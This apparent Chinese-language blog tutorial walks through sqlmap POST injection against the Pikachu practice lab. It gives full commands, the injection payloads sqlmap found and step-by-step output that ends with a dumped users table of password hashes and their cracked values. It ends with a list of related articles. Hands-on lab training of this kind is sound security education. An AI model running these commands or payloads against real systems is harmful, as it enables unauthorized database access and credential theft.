想归想,难过归难过,若你岁岁平安,我可生生不见。。。

----  网易云热评

一、检测是否存在注入

1、通过BurpSuite抓包获取提交的数据

2、sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2"

--data指定提交的数据

运行结果:id值存在注入,可能是布尔盲注、报错注入、时间盲注、联合注入

[14:37:09] [INFO] POST parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable

POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 46 HTTP(s) requests:

---

Parameter: id (POST)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1 AND 9442=9442&submit=%E6%9F%A5%E8%AF%A2

Type: error-based

Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)

Payload: id=1 AND GTID_SUBSET(CONCAT(0x717a717871,(SELECT (ELT(4194=4194,1))),0x7170717671),4194)&submit=%E6%9F%A5%E8%AF%A2

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: id=1 AND (SELECT 2494 FROM (SELECT(SLEEP(5)))BUUY)&submit=%E6%9F%A5%E8%AF%A2

Type: UNION query

Title: Generic UNION query (NULL) - 2 columns

Payload: id=1 UNION ALL SELECT CONCAT(0x717a717871,0x59534b7664464e646f414f4e546e6c72455448476447636f50574a75434971514a486f6d724a664e,0x7170717671),NULL-- -&submit=%E6%9F%A5%E8%AF%A2

---

[14:37:16] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.4.45, Nginx 1.15.11, PHP

back-end DBMS: MySQL >= 5.6

[14:37:16] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

二、获取数据库名称

sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" --dbs

转存失败重新上传取消转存失败重新上传取消转存失败重新上传取消

运行结果:

[14:42:01] [INFO] the back-end DBMS is MySQL

web application technology: Nginx 1.15.11, PHP, PHP 5.4.45

back-end DBMS: MySQL >= 5.6

[14:42:01] [INFO] fetching database names

available databases [10]:

[*] challenges

[*] dvwa

[*] information_schema

[*] mysql

[*] performance_schema

[*] pikachu

[*] security

[*] sys

[*] www_dgdg_com

[*] www_zm_com

[14:42:01] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

三、获取表名

sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" -D pikachu --tables

运行结果:

14:44:08] [INFO] the back-end DBMS is MySQL

web application technology: PHP, PHP 5.4.45, Nginx 1.15.11

back-end DBMS: MySQL >= 5.6

[14:44:08] [INFO] fetching tables for database: 'pikachu'

Database: pikachu

[5 tables]

+----------+

| member   |

| httpinfo |

| message  |

| users    |

| xssblind |

+----------+

[14:44:08] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

四、获取字段名

sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users --columns

运行结果:

[14:51:18] [INFO] the back-end DBMS is MySQL

web application technology: PHP, PHP 5.4.45, Nginx 1.15.11

back-end DBMS: MySQL >= 5.6

[14:51:18] [INFO] fetching columns for table 'users' in database 'pikachu'

Database: pikachu

Table: users

[4 columns]

+----------+------------------+

| Column   | Type             |

+----------+------------------+

| level    | int(11)          |

| id       | int(10) unsigned |

| password | varchar(66)      |

| username | varchar(30)      |

+----------+------------------+

[14:51:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

五、获取字段内容

sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users --dump "username,password

运行结果:

Database: pikachu

Table: users

[3 entries]

+----+---------+-------------------------------------------+----------+

| id | level   | password                                  | username |

+----+---------+-------------------------------------------+----------+

| 1  | 1       | e10adc3949ba59abbe56e057f20f883e (123456) | admin    |

| 2  | 2       | 670b14728ad9902aecba32e22fa4f6bd (000000) | pikachu  |

| 3  | 3       | e99a18c428cb38d5f260853678922e03 (abc123) | test     |

+----+---------+-------------------------------------------+----------+

[14:56:08] [INFO] table 'pikachu.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.139.129/dump/pikachu/users.csv'

[14:56:08] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

六、其他检测POST注入方法

1、BurpSuite抓包,将数据包内容保存到1.txt

POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1

Host: 192.168.139.129

Content-Length: 30

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://192.168.139.129

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://192.168.139.129/pikachu/vul/sqli/sqli_id.php

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: PHPSESSID=6t4bb3nb4rarqod4j073m038h4

Connection: close

id=1&submit=%E6%9F%A5%E8%AF%A2

2、获取数据库名称

sqlmap -r /home/aiyou/桌面/1.txt --dbs

-r:指定数据包的绝对路径

3、获取表名

sqlmap -r /home/aiyou/桌面/1.txt -D pikachu --tables

4、获取字段名

sqlmap -r /home/aiyou/桌面/1.txt -D pikachu -T users --columns

5、获取字段内容

sqlmap -r /home/aiyou/桌面/1.txt -D pikachu -T users --dump "username,password"

禁止非法,后果自负

欢迎关注公众号:web安全工具库

欢迎关注视频号:之乎者也吧

Sqlmap -- POST注入相关推荐

  1. 【安全牛学习笔记】SQLMAP自动注入-REQUEST

    SQLMAP自动注入-----REQUEST 数据段:   --data get/post都适用 sqlmap -u "http://1.1.1.1/a.php" --data=& ...

  2. SQL注入攻击及防御 手动注入+sqlmap自动化注入实战(网络安全学习12)

    CONTENTS 1 项目实验环境 2 SQL注入概述 2.1 SQL注入简介 2.2 SQL注入的危害 3 SQL基础回顾 3.1 联合查询union 3.2 information_schema数 ...

  3. sqlmap中转注入

    当使用 sqlmap 测试注入点时出现下列信息时,就需要在请求网址时忽略SSL证书 python3 sqlmap.py -u "http://xxxx?&daxxtae=null&a ...

  4. 【安全牛学习笔记】SQLMAP自动注入-INHECTION、DETECTION、TECHNIQUES

    SQLMAP自动注入04-----INJECTION -p 指定扫描的参数,使--level失效 -p "user-agent,referer" --skip 排除指定的扫描参数 ...

  5. 【安全牛学习笔记】课时94 SQLMAP自动注入-REQUEST和SQLMAP自动注入-OPTIMIZATION

    SQLMAP自动注入02-----REQUEST --delay 每次http(s)请求之间延迟时间,浮点数,单位为秒,默认无延迟 --timeout 请求超时时间,浮点数,默认为30秒 --retr ...

  6. sqlmap自动扫描注入点_同天上降魔主,真是人间太岁神——SQLMAP 高级教程

    昨天对一个网站做渗透测试,本来想自己写脚本来sql注入的,但是觉得麻烦还是用了sqlmap 这一用发现sqlmap好多好玩的地方,以前用sqlmap 也就 -r -u ,觉得这样就够用了,直到昨天才发 ...

  7. Sqlmap 渗透注入总是显示无法连接目标网络问题分析与解决

    问题如下: [CRITICAL] connection reset to the target URL. sqlmap is going to retry the request(s) 分析与解决: ...

  8. SQLMAP数据库注入工具下载安装

    介绍 Sqlmap 是一个自动化的 SQL 注入工具,其主要功能是扫描.发现并利用给定的 Url 的 Sql 注入漏洞,目前支持 MySQL. Oracle. PostgreSQL. Microsof ...

  9. Sqlmap(SQL注入自动化工具)

    简介 开源的SQL注入漏洞检测的工具,能够检测动态页面中的get/post参数,cookie,http头,还能够查看数据,文件系统访问,甚至能够操作系统命令执行. 检测方式:布尔盲注.时间盲注.报错注 ...

最新文章

  1. 三层交换机原理:02怎么用三层交换机?
  2. 图论 ---- CF1495D .BFS Trees(图论最短路生成树+枚举计数+树的层次性)
  3. 深圳速度!这所筹建中的大学,迎来首任“掌门人”!
  4. IIS 的负载均衡【IIS7.0以上才可以使用】---- Application Request Routing(ARR)
  5. leetcode 343. 整数拆分(Integer Break)
  6. C++学习笔记之二:通过结构体来理解类
  7. unet训练自己的数据集_基于UNet网络实现的人像分割 | 附数据集
  8. DataFrame挑选其中两列,带列名
  9. 社会管理网格化 源码_为什么说网格化管理是基层社会治理的有效武器
  10. 人类最强运载火箭诞生!马斯克吹的牛再次兑现!
  11. frame中src怎么设置成一个变量_OpenCV图像人脸检测及视频中的人脸检测(附源码)...
  12. 你关注什么,输出什么
  13. 毕设题目:Matlab电力负荷预测
  14. Java:Map转List (用stream实现)
  15. android apk自动安装包下载,Android 下载Apk并安装
  16. maximo跟java_maximo中直接应用得到数据库联接
  17. 【LWIP】原始套接字(SOCK_RAW)
  18. JAVA - 变量作用域
  19. 飞上“云端”的OA系统:什么是OA系统的云端化?
  20. c# picturebox 图像拖拽和缩放

热门文章

  1. 正则表达式:必须包含数字,小写,大写,符号
  2. 小米物联网世界第一_雷军:小米智能设备连接数世界第一 AI+IoT是核心战略
  3. WoeUSB - Linux制作Win10启动U盘
  4. 【笔记】python中常见的函数(一)
  5. 清风数学建模笔记——Excel画图保姆级教学
  6. 数据库课程设计-员工信息管理系统(基于python和MySQL实现)
  7. Java实现图片水印文字换行、平铺、旋转效果
  8. excel表格中的空白行你还在一个个删除吗?Speedoffice教你一招
  9. 1.5 深入理解常见类
  10. 中国天气预报城市代码